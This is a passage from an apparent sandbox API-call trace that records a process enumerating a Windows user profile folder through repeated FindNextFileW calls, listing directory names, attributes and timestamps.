ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0250.158] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0250.158] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0250.158] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0250.158] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6770de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x6770de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0250.159] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xc103692e, ftCreationTime.dwHighDateTime=0x1ca0451, ftLastAccessTime.dwLowDateTime=0x1dd1880d, ftLastAccessTime.dwHighDateTime=0x1cbf8ec, ftLastWriteTime.dwLowDateTime=0x1dd1880d, ftLastWriteTime.dwHighDateTime=0x1cbf8ec, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0250.159] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x674ac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2e400, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0250.160] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x9012aa61, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0250.160] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8d30919, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8d30919, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8ead6dc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0250.160] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8da2d3a, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8da2d3a, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8e8757c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0250.160] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8deeffb, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8deeffb, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8ead6dc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0250.160] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0250.160] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0250.161] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0250.161] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0250.161] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0250.161] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0250.161] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0250.161] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0250.161] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0250.161] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0250.162] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.162] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0250.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.162] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.162] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0250.162] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0250.163] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0250.163] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0250.163] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0250.163] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0250.163] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0250.163] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0250.164] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0250.164] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0250.164] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0250.164] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0250.164] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0250.164] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6770de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x6770de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0250.164] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xc103692e, ftCreationTime.dwHighDateTime=0x1ca0451, ftLastAccessTime.dwLowDateTime=0x1dd1880d, ftLastAccessTime.dwHighDateTime=0x1cbf8ec, ftLastWriteTime.dwLowDateTime=0x1dd1880d, ftLastWriteTime.dwHighDateTime=0x1cbf8ec, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0250.165] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x674ac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2e400, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0250.165] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x9012aa61, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0250.165] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8d30919, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8d30919, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8ead6dc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0250.165] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8da2d3a, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8da2d3a, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8e8757c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0250.165] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8deeffb, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8deeffb, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8ead6dc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0250.165] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0250.165] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0250.166] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0250.166] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, 